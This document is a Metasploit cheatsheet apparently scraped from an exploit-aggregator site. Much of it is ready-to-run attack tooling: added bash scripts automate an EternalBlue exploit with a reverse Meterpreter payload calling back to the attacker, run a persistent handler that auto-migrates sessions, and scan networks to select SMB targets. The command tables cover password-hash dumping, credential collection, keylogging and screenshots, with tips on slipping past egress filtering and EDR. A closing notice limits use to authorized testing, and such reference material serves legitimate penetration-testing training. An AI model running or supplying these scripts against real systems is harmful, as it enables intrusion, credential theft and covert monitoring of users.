## https://sploitus.com/exploit?id=9A5FD168-FC71-5513-9CDE-518F25F86CEB
# Metasploit Cheatsheet
A practical reference for using Metasploit. Split into two parts: one for people just starting out, and one for those who already know the basics and want to go deeper.
No theory. No fluff. Just commands that work.
---
## Table of Contents
- [Beginner Guide](#beginner-guide)
- [What is Metasploit?](#what-is-metasploit)
- [Starting Metasploit](#starting-metasploit)
- [Your First 5 Commands](#your-first-5-commands)
- [Understanding Module Options](#understanding-module-options)
- [Basic Workflow](#basic-workflow)
- [Pro Reference](#pro-reference)
- [Session Management](#session-management)
- [Meterpreter Commands](#meterpreter-commands)
- [Useful Auxiliary Modules](#useful-auxiliary-modules)
- [Advanced Tips](#advanced-tips)
- [Legal Notice](#legal-notice)
---
## Beginner Guide
### What is Metasploit?
Metasploit is a penetration testing framework. It gives you a set of tools to find and test vulnerabilities in systems, the same way an attacker would, but in a controlled and authorized way: modules for scanning, exploitation, payload delivery and post-exploitation, all driven from one console.
It ships with Kali Linux and can be installed on most other Linux distributions (and on macOS and Windows, though Kali is the usual choice). Everything happens inside a terminal.
---
### Starting Metasploit
Open your terminal and type:
```bash
msfconsole
```
That's it. It will load up and show you a prompt like this:
```
msf6 >
```
This is where you type all your commands.
> **Tip:** Before you start, run `msfdb init` once to create the PostgreSQL database, then confirm inside the console with `db_status` that it reports a connection. With the database up, Metasploit stores the hosts, services, credentials and vulnerabilities from your scans so you can query them later instead of re-scanning.
---
### Your First 5 Commands
These are the only commands you need to know at the start.
**1. Search for a module**
```bash
search
```
Example: searching for an SMB vulnerability:
```bash
search eternalblue
```
This shows you a list of matching modules. Each row has an index number, the module name, disclosure date, rank (how reliable the exploit is), whether it supports `check`, and a description. You can `use` a result by its index number as well as by name.
---
**2. Select a module**
```bash
use
```
Example:
```bash
use exploit/windows/smb/ms17_010_eternalblue
```
Once you do this, your prompt changes to show the module name. That means it's selected.
---
**3. See what the module needs**
```bash
show options
```
This shows all the settings the module requires. Anything marked `yes` under `Required` must be filled in before you can run the exploit.
---
**4. Set a value**
```bash
set
```
The two most common things you'll set are the target address and your own address:
```bash
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
```
- **RHOSTS** = the target machine's IP address. Current modules use `RHOSTS` even for a single target (it also takes a range or a CIDR block) and accept `RHOST` as an alias; `show options` tells you the exact name the module expects.
- **LHOST** = your own machine's IP address, as the target can reach it. On a box with several interfaces (VPN, lab network) this is not always the default one.
---
**5. Run the exploit**
```bash
exploit
```
Or use `run`; both do the same thing.
---
### Understanding Module Options
When you run `show options`, you'll see a table of the module's options and, below it, a second table for the selected payload. Here is what the options you will meet in almost every module mean:
| Option | What it is |
| --- | --- |
| `LHOST` | Your IP address (your Kali machine), as seen from the target |
| `LPORT` | Your port (where the connection comes back to you); `reverse_tcp` payloads default to 4444, `reverse_https` to 8443 |
| `RHOSTS` | The target's IP address, range, or CIDR block (older modules spell it `RHOST`) |
| `RPORT` | The target's port (usually pre-filled with the service's default) |
| `PAYLOAD` | The code that runs on the target after the exploit works; a default is picked for you when you `use` an exploit |
Most of the time you only need to set `RHOSTS` and `LHOST`. The rest is usually pre-filled, but read the `Required` column every time: some modules also need a share name, a URI path, or credentials before they will run.
---
### Basic Workflow
Follow these steps every time:
```
1. msfconsole      Start Metasploit
2. search          Find the right module
3. use             Select it
4. show options    See what needs to be set
5. set RHOSTS      Set the target
6. set LHOST       Set your machine
7. set PAYLOAD     Set payload if needed
8. check           Confirm the target is vulnerable (when the module supports it)
9. exploit         Run it
```
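The workflow above run non-interactively, as an added example that is not part of the original cheatsheet: a bash script that asks the module to `check` the target first and only goes on to `exploit` when the CheckCode says vulnerable. It uses the EternalBlue module from earlier on the page and `msfconsole -q -x`, which runs a semicolon-separated command list without an interactive prompt. The addresses are constructed lab values, and the phrases it greps for are the standard CheckCode messages Metasploit prints.

```bash
#!/usr/bin/env bash
# Added example, not from the original cheatsheet. Runs the beginner workflow
# end to end without typing into msfconsole, and gates `exploit` on `check`.
# Addresses are constructed lab values; override them via the environment.
set -eu

MODULE="exploit/windows/smb/ms17_010_eternalblue"
RHOSTS="${RHOSTS:-192.168.1.10}"                 # assumed target
LHOST="${LHOST:-192.168.1.5}"                    # assumed attacker address
PAYLOAD="windows/x64/meterpreter/reverse_https"
LPORT="${LPORT:-443}"                            # binding 443 needs root

# msfconsole -x takes a semicolon-separated command list; build the two lists
# from the same variables so the check and the exploit cannot drift apart.
check_cmds() {
  printf 'use %s; set RHOSTS %s; check; exit' "$MODULE" "$1"
}

exploit_cmds() {
  printf 'use %s; set RHOSTS %s; set LHOST %s; set LPORT %s; set PAYLOAD %s; exploit' \
    "$MODULE" "$1" "$LHOST" "$LPORT" "$PAYLOAD"
}

# Read `check` output on stdin and return 0 only for a go decision.
# Metasploit renders CheckCode::Vulnerable as "The target is vulnerable." and
# CheckCode::Appears as "The target appears to be vulnerable."; Safe ("is not
# exploitable"), Detected and Unknown are all treated as no-go.
check_says_go() {
  grep -E 'The target (is|appears to be) vulnerable' >/dev/null
}

run_workflow() {
  local target="$1"
  if ! command -v msfconsole >/dev/null 2>&1; then
    echo "msfconsole not installed; would run: $(check_cmds "$target")" >&2
    return 2
  fi
  if msfconsole -q -x "$(check_cmds "$target")" | check_says_go; then
    # Interactive on purpose: a successful exploit drops you into Meterpreter.
    msfconsole -q -x "$(exploit_cmds "$target")"
  else
    echo "check did not report $target as vulnerable; not exploiting" >&2
    return 1
  fi
}

# Only fire when run explicitly; sourcing the file just defines the functions.
if [ "${1:-}" = "--run" ]; then
  run_workflow "$RHOSTS"
fi
```

Run it as `RHOSTS=10.0.0.5 ./workflow.sh --run`. The point of the split is that `check` output is parsed by a separate function, so the same gate can be reused for any module that implements `check`, and a module whose check returns Unknown never gets exploited by accident.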
---
## Pro Reference
### Session Management
When an exploit works, Metasploit opens a **session**: a connection to the target machine. You can manage multiple sessions at once; each keeps its own numeric ID until it dies.
| Command | What it does |
| --- | --- |
| `sessions` | List all active sessions (`sessions -l` does the same) |
| `sessions -i <id>` | Interact with a session by its ID |
| `sessions -k <id>` | Kill a specific session |
| `sessions -K` | Kill all sessions |
| `background` | Send the current session to the background; the prompt returns to `msf6 >` and the session stays alive |
| `sessions -u <id>` | Upgrade a plain shell session to Meterpreter; this opens a new Meterpreter session and leaves the original shell open |
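A listener configuration that puts these commands to work, as an added example not from the original cheatsheet. It writes a resource script for a persistent `multi/handler` that keeps listening after the first callback (`ExitOnSession false` together with `exploit -j -z`), backgrounds every new session instead of dropping you into it, and runs the `post/windows/manage/migrate` post module on arrival so each session is already sitting in a fresh process by the time you `sessions -i` it. The address is a constructed lab value, and the two timeout values are chosen for the example rather than being Metasploit defaults.

```bash
#!/usr/bin/env bash
# Added example, not from the original cheatsheet: a persistent handler that
# keeps accepting callbacks and hands each new session back backgrounded and
# already migrated. LHOST is a constructed lab address.
set -eu

LHOST="${LHOST:-192.168.1.5}"   # assumed attacker address
RC="${RC:-/tmp/handler.rc}"

# Emit the resource script. Every non-comment line is a normal msfconsole
# command, so the same text can be pasted into the console one line at a time.
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST $1
set LPORT 443
# keep the job alive after the first session instead of exiting the handler
set ExitOnSession false
# reverse_https sessions survive network drops; these values (chosen for the
# example) control how long Metasploit waits before declaring one dead
set SessionCommunicationTimeout 600
set SessionExpirationTimeout 86400
# run a post module as soon as a session checks in: migrate moves the session
# into a process it spawns itself (notepad.exe by default), away from the
# process that got exploited
set AutoRunScript post/windows/manage/migrate
# -j runs the handler as a background job, -z does not interact with sessions
exploit -j -z
EOF
}

write_handler_rc() {
  handler_rc "$LHOST" > "$RC"
  echo "$RC"
}

# Count the non-comment commands so a truncated write is noticed before use.
rc_command_count() {
  grep -Ev '^[[:space:]]*(#|$)' "$1" | wc -l | tr -d ' '
}

if [ "${1:-}" = "--run" ]; then
  write_handler_rc >/dev/null
  # once callbacks arrive: sessions -l, sessions -i <id>, background
  msfconsole -q -r "$RC"
fi
```

Because the handler runs as a job, `jobs` lists it and `jobs -k <id>` stops it; the sessions it has already accepted outlive the job. If a callback arrives as a plain shell from some other handler, `sessions -u <id>` brings it up to Meterpreter.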
---
### Meterpreter Commands
Meterpreter is an advanced shell that runs in memory on the target. It gives you a lot more control than a basic shell.
**System Info**
| Command | What it does |
| --- | --- |
| `sysinfo` | OS, hostname, architecture of target |
| `getuid` | Current user you are running as |
| `getpid` | Process ID of your Meterpreter session |
| `ps` | List all running processes |
**Privilege Escalation**
| Command | What it does |
| --- | --- |
| `getsystem` | Try to escalate to SYSTEM via named-pipe impersonation and token duplication (Windows only; on Linux you need a local exploit or a misconfiguration instead) |
| `migrate <pid>` | Move the session into another process (more stable; never more privileged than what you already hold) |
> After `getsystem`, migrate into a long-lived process so the session survives if the exploited process exits: `explorer.exe` for the logged-on user's desktop, or a SYSTEM service such as `spoolsv.exe` if you want to keep SYSTEM. Migration does not raise privileges; you inherit the token of the process you move into, so migrating from SYSTEM into a user's `explorer.exe` drops you back to that user. Do not migrate into `lsass.exe`: if your code crashes it, Windows reboots the host, and it is the process EDR products watch most closely.
**File Operations**
| Command | What it does |
| --- | --- |
| `pwd` | Show current directory on target |
| `ls` | List files in current directory |
| `cd <dir>` | Change directory |
| `upload <local_file> <remote_path>` | Upload a file to the target |
| `download <remote_file> [local_path]` | Download a file from the target |
| `search -f <pattern> [-d <dir>]` | Search for a file on the target, e.g. `search -f *.kdbx -d C:\\Users` |
**Credential Gathering**
| Command | What it does |
| --- | --- |
| `hashdump` | Dump local NTLM hashes from the SAM (Windows; needs SYSTEM, so `getsystem` first) |
| `run post/multi/recon/local_exploit_suggester` | List local exploit modules that may apply to this host's OS and patch level; it is a heuristic, so verify each one before running it |
| `run post/windows/gather/credentials/credential_collector` | Collect password hashes and access tokens from the host (needs the same privileges as `hashdump`) |
**Other Useful Commands**
| Command | What it does |
| --- | --- |
| `shell` | Drop into a native system shell |
| `screenshot` | Take a screenshot of the target's screen |
| `keyscan_start` | Start logging keystrokes |
| `keyscan_dump` | Dump captured keystrokes |
| `keyscan_stop` | Stop keylogger |
> `screenshot` and the `keyscan_*` commands only see the desktop of the process they run in. To capture the logged-on user's screen and keystrokes, `migrate` into that user's `explorer.exe` first; a SYSTEM service process has no interactive desktop to capture.
---
### Useful Auxiliary Modules
Auxiliary modules do not deliver a payload. They scan, fingerprint, brute-force and fuzz, and they write what they find to the database. All scanners take `RHOSTS` (a single IP, a range or a CIDR block) and a `THREADS` option that controls how many targets are probed in parallel; leave it at 1 when you want to stay quiet.
**Port Scanning**
```bash
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443,445,3389
run
```
**SMB**
```bash
# Detect SMB version
use auxiliary/scanner/smb/smb_version
# Check for MS17-010 (EternalBlue) without exploiting
use auxiliary/scanner/smb/smb_ms17_010
# Brute force SMB login (check the account lockout policy first;
# set STOP_ON_SUCCESS true to stop hammering once a pair works)
use auxiliary/scanner/smb/smb_login
```
**SSH**
```bash
# Detect SSH version
use auxiliary/scanner/ssh/ssh_version
# Brute force SSH login (same lockout and STOP_ON_SUCCESS advice as smb_login)
use auxiliary/scanner/ssh/ssh_login
```
**HTTP**
```bash
# Detect web server version
use auxiliary/scanner/http/http_version
# Directory brute force
use auxiliary/scanner/http/dir_scanner
```
---
### Advanced Tips
**Set multiple hosts at once**
```bash
set RHOSTS 192.168.1.1-254
set RHOSTS 192.168.1.0/24
```
`RHOSTS` also accepts several of these separated by spaces, a hostname, or `file:/path/to/targets.txt` with one target per line.
**Use a payload that gets through egress filtering**
```bash
set PAYLOAD windows/meterpreter/reverse_https
```
Most networks allow outbound 443, and the TLS wrapper hides the Meterpreter traffic from simple content inspection. It is not invisible: a TLS-intercepting proxy sees the plaintext, and the self-signed certificate and regular polling pattern are exactly what detection teams look for. The payload's `LPORT` defaults to 8443; set it to 443 (binding it needs root) so the callback looks like ordinary HTTPS.
**Save your scan results to the database**
```bash
db_nmap -sV 192.168.1.0/24
```
This runs nmap with the arguments you give it and imports everything, open ports, services and versions, straight into the Metasploit database. Afterwards `hosts` and `services` query what was found (`services -p 445` filters by port), and `services -p 445 -R` copies the matching hosts into `RHOSTS` for the next module. Use `workspace` to keep different engagements apart.
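The database used as a targeting source rather than a notebook, as an added example not from the original cheatsheet: a resource script that scans a range, pulls every host with 445 open back out of the database into `RHOSTS` (`services -R`), runs the non-destructive MS17-010 scanner against only those, lists what it flagged, and exports the service table as CSV for use outside the console. The range and the sample CSV lines are constructed; the column order assumed for `services -o` output is `host,port,proto,name,state,info`, and the parser assumes plain comma separation (it strips any double quotes but does not handle commas inside fields).

```bash
#!/usr/bin/env bash
# Added example, not from the original cheatsheet: scan into the database,
# let the database pick the targets, export the result. The range is a
# constructed lab value.
set -eu

RANGE="${RANGE:-192.168.1.0/24}"        # assumed lab network
WORKSPACE="${WORKSPACE:-lab}"
CSV="${CSV:-/tmp/services.csv}"

# Resource script: args are workspace name, target range, CSV output path.
recon_rc() {
  cat <<EOF
db_status
workspace -a $1
db_nmap -sV -p 22,80,443,445,3389 $2
# everything nmap found is now queryable: hosts, services, vulns, notes
hosts
# -R pushes the matching hosts into RHOSTS, so the next module only sees
# hosts that actually answered on 445
services -p 445 -R
use auxiliary/scanner/smb/smb_ms17_010
set THREADS 16
run
# the scanner records its findings, so vulns lists what it flagged
vulns
# -o writes the services table as CSV (assumed columns: host,port,proto,name,state,info)
services -o $3
exit
EOF
}

# Pull hosts exposing a given port out of the exported CSV, one per line,
# skipping the header row and anything not reported as open. Quotes are
# stripped first; fields containing commas are not handled (assumption).
hosts_with_port() {
  awk -F, -v port="$2" '{ gsub(/"/, "") }
    NR > 1 && $2 == port && $5 == "open" { print $1 }' "$1"
}

if [ "${1:-}" = "--run" ]; then
  recon_rc "$WORKSPACE" "$RANGE" "$CSV" > /tmp/recon.rc
  msfconsole -q -r /tmp/recon.rc
  echo "hosts with SMB open:"
  hosts_with_port "$CSV" 445
fi
```

`workspace -a` on an existing name just complains and carries on, so the script is safe to re-run; the second `db_nmap` merges into the same host records rather than duplicating them.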
**Search by CVE**
```bash
search cve:2021-44228
```
**Check if a target is vulnerable before exploiting**
```bash
check
```
Not all modules support this (the `Check` column in `search` output tells you which do). When they do, use it first: it confirms the target is affected without sending the exploit, which avoids unnecessary noise and the risk of crashing the service. The result is a CheckCode such as `The target is vulnerable`, `The target appears to be vulnerable`, `The target is not exploitable`, or `Cannot reliably check exploitability`; only the first two mean go.
**Reload all modules after adding new ones**
```bash
reload_all
```
Custom or third-party modules go under `~/.msf4/modules/`, mirroring the framework's own layout (for example `~/.msf4/modules/exploits/linux/http/`); `reload_all` picks them up without restarting the console.
---
## Legal Notice
Only use Metasploit on systems you own or have **written permission** to test.
Running exploits against systems without permission is illegal in most countries, including under the Computer Fraud and Abuse Act (USA), the Computer Misuse Act (UK), and similar laws elsewhere.
This repo is for learning and authorized testing only.
---
## Contributing
If something is wrong or outdated, open an issue or submit a pull request. Keep it practical: only add things that are actually useful in real engagements.